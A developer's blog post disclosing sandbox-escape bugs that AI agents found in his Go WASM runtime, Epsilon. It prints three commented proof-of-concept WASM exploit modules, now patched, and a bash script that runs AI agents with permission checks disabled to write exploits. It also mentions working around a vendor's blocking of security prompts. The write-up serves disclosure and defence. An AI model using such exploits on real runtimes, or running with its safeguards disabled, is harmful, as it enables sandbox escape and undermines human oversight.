# All the Bugs They Found

> Source: <https://andreapivetta.com/posts/all-the-bugs-they-found.html>
> Published: 2026-05-19 10:33:35+00:00

# All the bugs they found

Last year I wrote a small WASM runtime in Go,
[Epsilon](https://github.com/ziggy42/epsilon). As far as runtimes go, this is
a pretty simple one: no JIT, just a pure instruction interpreter in ~11k lines of code.
It is also very extensively tested against the
[official WASM testsuite](https://github.com/WebAssembly/testsuite).

Epsilon is designed to be embeddable in other applications and provide a sandbox for potentially untrusted code.

How many security vulnerabilities do you think AI agents found in it?

**More than 20.**

Most of these were somewhat simple DoS attacks, e.g. panics during parsing or validation. Some were clear API design failures that would probably have surfaced sooner with a bit more usage of the project. A few weren't exploitable on their own, but would become serious if combined with a future bug elsewhere.

A handful, though, were properly interesting: sandbox escapes that let a malicious
[WASM module](https://developer.mozilla.org/en-US/docs/WebAssembly/Guides/Concepts#webassembly_key_concepts)
break out of its isolation and reach into another module's private state. These are my
favorites.

## Background

A single Epsilon runtime can host multiple WASM modules. In the WASM security model, modules are isolated except for explicitly exported (and imported) objects. Unexported functions, memories, etc., are private to the module that defined them.

WASM is a typed stack machine, but the type checking does not happen at runtime: before
execution, a validator walks the bytecode and verifies that at any point the values on
the stack have the expected type. For example, a module that tried to
`local.set`

an `i32`

into a `funcref`

local would be
rejected before it ever started running. Epsilon then executes blindly, trusting the
validator's earlier checks.

Thanks to the type guarantees provided by the validator, a
`funcref`

at runtime in Epsilon is represented as an `int32`

:
`-1`

is the null sentinel, and any non-negative value is an index into the
global function store, shared across all modules instantiated in the runtime. As a
result, the constant `0`

and a `funcref`

pointing to the first
function in the store are indistinguishable during execution. This simplifies the
implementation and improves performance, at the cost of delegating safety entirely to
the validator.

Each attacker module in the following sections runs alongside the same victim module:

```
(module
  (func $secret (result i32)   ;; declares a function $secret: takes no parameters,
                               ;; returns a 32-bit integer. Private, never exported
    i32.const 1337             ;; pushes 1337 onto the stack; becomes the return value
  )
)
```

Since `$secret`

is the first function instantiated into the runtime, it lives
at store index 0. The goal of each attacker module is to get the VM to call it,
returning `1337`

, despite never being given a legitimate
`funcref`

to it.

## 1. Zero Is Not Null

The simplest of the three. Here's the attacker:

```
(module
  (type $t (func (result i32)))   ;; the call_indirect type signature
  (table 1 funcref)               ;; a table of size 1 (essentially an array of funcrefs).
                                  ;; Identified by its module-level index, which is 0
                                  ;; here since it's the first (and only) table declared

  (func (export "exploit") (result i32)
    (local $f funcref)            ;; declared, never assigned;
                                  ;; per spec, ref locals default to null

    i32.const 0                   ;; the slot in the table where we'll write
                                  ;; stack: [0]
    local.get $f                  ;; push $f's value (null)
                                  ;; stack: [0, null]
    table.set 0                   ;; immediate 0 picks which table to write to
                                  ;; (tables[0]); pops two values from the stack:
                                  ;; first the funcref (null), then the slot index.
                                  ;; Writes tables[0][0] = null
                                  ;; stack: []

    i32.const 0                   ;; the slot in the table to fetch from next
                                  ;; stack: [0]
    call_indirect (type $t)       ;; pop the slot, fetch tables[0][slot] (null),
                                  ;; and call it
  )
)
```

The `exploit`

function, while perfectly valid WASM, should trap at runtime.
The local `$f`

is uninitialized, therefore null.
`call_indirect`

should fail.

Except that in Epsilon, it didn't. It called `$secret`

instead.

The culprit was how locals were initialized. When a function is called, the spec
requires locals to be initialized to their default values: zero for numeric and vector
types, but null for reference types. Epsilon achieved this by zeroing all non-parameter
locals using Go's `clear()`

:

```
// Clear non-parameter locals to their zero values.
clear(locals[numParams:])
```

This was idiomatic and fast, but Go's `clear()`

simply set the local to
`0`

. Per our funcref representation, that's not null (`-1`

): it's
the store index of `$secret`

. When `exploit`

was called, rather
than trapping on a null `call_indirect`

, the VM called the function at store
index 0.

## 2. Phantom Block Parameter

This one combines two separate bugs:

```
(module
  (type $t (func (result i32)))
  (table 1 funcref)

  (func (export "exploit") (result i32)
    (local $f funcref)

    ref.null func               ;; push a null funcref onto the stack
    i32.const 0

    (block (param i32)          ;; block consumes the i32 from the stack...
      drop                      ;; ...and immediately drops it
    )

    local.set $f                ;; store top of stack into $f (the null funcref)
    local.get $f
    ref.is_null                 ;; is $f null?

    if (result i32)
      i32.const 42              ;; expected path: $f was null, return 42
    else                        ;; unreachable path: $f is always null
      i32.const 0
      local.get $f
      table.set 0
      i32.const 0
      call_indirect (type $t)
    end
  )
)
```

In any correct WASM implementation (and indeed in the latest version of Epsilon),
`exploit`

returns `42`

, as expected. It returned `1337`

instead.

### Stack Height Misalignment

During their execution, control-flow blocks (`block`

,
`loop`

, `if`

) may consume inputs from the stack and produce
results on it. At the end of execution the stack must look exactly as the block's
signature describes: N_params consumed, N_results pushed in their place. Anything the
body left in between has to be discarded, so the runtime needs to know how high the
stack was when entering the block.

In Epsilon, that height was recorded when a new control frame was pushed onto the control frame stack:

```
vm.pushControlFrame(frame, controlFrame{
    stackHeight: vm.stack.size(),   // height at block entry
    // ...
})
```

But here lies the first bug: that line captures the stack height
*after* the block's parameters are already pushed. In WASM, parameters are
*consumed* by the block: they belong to the block, not to the surrounding scope.
So the validator and the VM now disagree by exactly N parameters about where "the bottom
of the block" is on the stack.

### Memory Resurrection

When a block ends, the VM calls `unwind`

to restore the stack to its
declared, pre-block height. `targetHeight`

is the stack height recorded in
the `controlFrame`

structure.

```
func (s *valueStack) unwind(targetHeight, preserveCount uint32) {
    valuesToPreserve := s.data[s.size()-preserveCount:]
    s.data = s.data[:targetHeight]
    s.data = append(s.data, valuesToPreserve...)
}
```

Because of the stack height misalignment bug above, `targetHeight`

is too
high: it counts the block's parameters as if they were still on the stack. Therefore
`s.data[:targetHeight]`

causes the slice to grow back rather than be
truncated. As long as `targetHeight <= cap(s.data)`

, Go is happy to
re-expose whatever was sitting in the backing array.

Parameters that the validator considered consumed are now resurrected on top of the stack.

### Bugs Collide

Let's walk through the `exploit`

function with both bugs in mind:

```
(func (export "exploit") (result i32)
  (local $f funcref)

  ref.null func        ;; stack: [null_funcref]
  i32.const 0          ;; 0 is the index where $secret happens to sit in the
                       ;; global function store, since it was the very first
                       ;; function instantiated
                       ;; stack: [null_funcref, 0]

  (block (param i32)   ;; bug #1: VM records stackHeight = 2; the validator,
                       ;; treating the i32 as consumed (per spec), records 1
    drop               ;; pops and discards the top of the stack (the 0)
                       ;; stack: [null_funcref]
  )                    ;; bug #2: `end` calls unwind, which sets s.data to
                       ;; s.data[:2], so len 1 grows back to 2, and the 0 we
                       ;; dropped resurrects on top. The top is now an int32
                       ;; of value 0, but the validator still thinks it's a
                       ;; funcref
                       ;; stack: [null_funcref, 0]

  local.set $f         ;; 0 is put in $f, which should be a funcref. Since
                       ;; Epsilon's internal representation of funcref is also
                       ;; an int32, this works at runtime
  local.get $f         ;; stack: [null_funcref, 0]
  ref.is_null          ;; null is -1, so 0 isn't null; pops the funcref and
                       ;; pushes 0 (false). The top of the stack visually
                       ;; still looks like 0, but its type changed from
                       ;; funcref to i32
                       ;; stack: [null_funcref, 0 (i32 false)]

  if (result i32)      ;; pops the i32 condition (0, false), so the else
                       ;; branch fires
                       ;; stack: [null_funcref]
    i32.const 42       ;; not taken
  else
    i32.const 0        ;; the slot index for the upcoming table.set
                       ;; stack: [null_funcref, 0]
    local.get $f       ;; the funcref value to store (actually the int32 0)
                       ;; stack: [null_funcref, 0, 0]
    table.set 0        ;; pops the funcref then the slot index; both are 0,
                       ;; so tables[0][0] now holds the integer 0 dressed as
                       ;; a funcref
                       ;; stack: [null_funcref]
    i32.const 0        ;; the slot index within the table to look up
                       ;; stack: [null_funcref, 0]
    call_indirect (type $t)
                       ;; pops the slot index, fetches tables[0][0] (our
                       ;; int 0 dressed as a funcref), which points at
                       ;; store[0] = $secret. Call it.
  end
)
```

A perfectly valid WASM module just called an unexported function from another module. By choosing a different integer, it could reach any private function in Epsilon's global store.

## 3. Ghost in the Stack

The first two exploits relied on the validator and VM disagreeing about values on the
stack inside the sandbox. This one shifts category: the disagreement is between a host
function's *declared* signature and what it *actually* returns at runtime.

```
(module
  (type $t (func (result i32)))
  (import "env" "leak" (func $leak (result funcref)))   ;; the host must provide env.leak
  (table 1 funcref)

  (func (export "exploit") (result i32)
    i32.const 0          ;; table index
    i32.const 0          ;; index of $secret in the global function store

    call $leak           ;; declared to return a funcref; the validator thinks
                         ;; the stack gains one new value after this call

    table.set 0          ;; store the "result" (actually our 0) into the table
    i32.const 0
    call_indirect (type $t)
    return
  )
)
```

For this exploit to land, the host needs to provide a function
`env.leak`

whose runtime behavior diverges from its signature: one that
returns *fewer* results than promised.

In a correct WASM implementation, the runtime should trap on that mismatch. In Epsilon, the VM blindly trusted the host's declared signature:

```
res := fun.hostCode(fun.module, args...)
vm.stack.pushAll(res)
```

If `leak`

returned an empty slice instead of the promised funcref,
`pushAll`

did nothing. The validator believed a funcref had been pushed.
Instead, the stack was unchanged.

The two `0`

s pushed before `$leak`

were still on the stack. The VM
ran `table.set 0`

and popped them: one as the funcref, one as the slot index.
`tables[0][0]`

now held the integer 0. `call_indirect`

fetched it
and happily called the function at index 0, `$secret`

.

## Methodology

I used a combination of approaches to find these bugs, starting with a script similar to
the one described in the
[Black-hat LLMs](https://youtu.be/1sd26pWhfmg?t=307)
talk:

## Show the script

``` bash
#!/bin/bash

# Directory to store vulnerability reports
VULN_DIR="vulnerabilities"
mkdir -p "$VULN_DIR"

# List of areas to investigate
AREAS=(
    "epsilon/parser.go"
    "epsilon/validation.go"
    "epsilon/vm.go"
    "epsilon/memory.go"
    "epsilon/imports.go"
    "wasip1/wasi_resources.go"
    "wasip1/wasi_poll.go"
    "wasip1/wasi_unix.go"
)

PROMPT_TEMPLATE="You are an expert security researcher and exploit developer.

STRICT CONSTRAINT: Do NOT modify any file outside the '$VULN_DIR/' directory. Do not touch 'epsilon/', 'wasip1/', or any other source file. All output goes in '$VULN_DIR/' only.

Your task is to objectively investigate the following file for security vulnerabilities: %s

Explore the file and any related files, data structures, or interactions it depends on. Where relevant, check behavior against the WebAssembly 2.0 specification (https://webassembly.github.io/spec/versions/core/WebAssembly-2.0.pdf) and the WASI Preview 1 specification — a deviation from spec in security-sensitive code is itself a vulnerability. Do not flag missing features from specs beyond WebAssembly 2.0.

Do not assume a vulnerability exists. If after thorough investigation you find nothing exploitable, state so clearly and stop.

If you confirm a vulnerability:
1. Create a dedicated directory: '$VULN_DIR/<vulnerability_name>/'
2. Write 'README.md' with: root cause, impact, and reproduction steps
3. Write a PoC exploit: a concrete, runnable demonstration (Go test, .wasm file, or script) that proves the vulnerability is triggerable by a malicious WebAssembly module without any special host configuration"

# Get agent from command line, default to claude
AGENT=${1:-claude}

if [ "$AGENT" == "claude" ]; then
    AGENT_CMD="claude --dangerously-skip-permissions"
elif [ "$AGENT" == "gemini" ]; then
    AGENT_CMD="gemini --yolo"
elif [ "$AGENT" == "vibe" ]; then
    AGENT_CMD="vibe --trust"
else
    echo "Usage: $0 [claude|gemini|vibe]"
    exit 1
fi

for AREA in "${AREAS[@]}"; do
    echo "--------------------------------------------------"
    echo "Starting investigation of area: $AREA using $AGENT"
    echo "--------------------------------------------------"

    CURRENT_PROMPT=$(printf "$PROMPT_TEMPLATE" "$AREA")

    $AGENT_CMD -p "$CURRENT_PROMPT"

    echo "Finished investigation of $AREA."
    echo "Sleeping for 10 seconds to respect rate limits..."
    sleep 10
done
```

Then I moved to a
[skill](https://github.com/ziggy42/epsilon/blob/main/.agents/skills/security-audit/SKILL.md)
instead, which is slightly more convenient.

I'm honestly not sure which one is better as I've used them at different times: by the time I switched, the script had already found the low-hanging fruit, so the skill never had a chance at those. Re-discovering the same bugs this way is left as an exercise to the reader.

To work around token limits, I also used a variety of models, mainly:

- Gemini 3 Flash
- Gemini 3.1 Pro
- Opus 4.7

Again, it's hard to compare their performance as they were used at different times. Most of the more serious problems were discovered by Gemini 3.1 Pro, which is the main model I used at the beginning.

Trying to work around Anthropic blocking security-related prompts does get pretty tiring though.

## Closing thoughts

Epsilon is a weekend hobby project, so I went in expecting agents to find
*something*. It was still astonishing to see some of these issues. Bug #2 in
particular is pretty cool.

Please update to version
[0.1.0](https://github.com/ziggy42/epsilon/blob/main/CHANGELOG.md#010---2026-05-19).
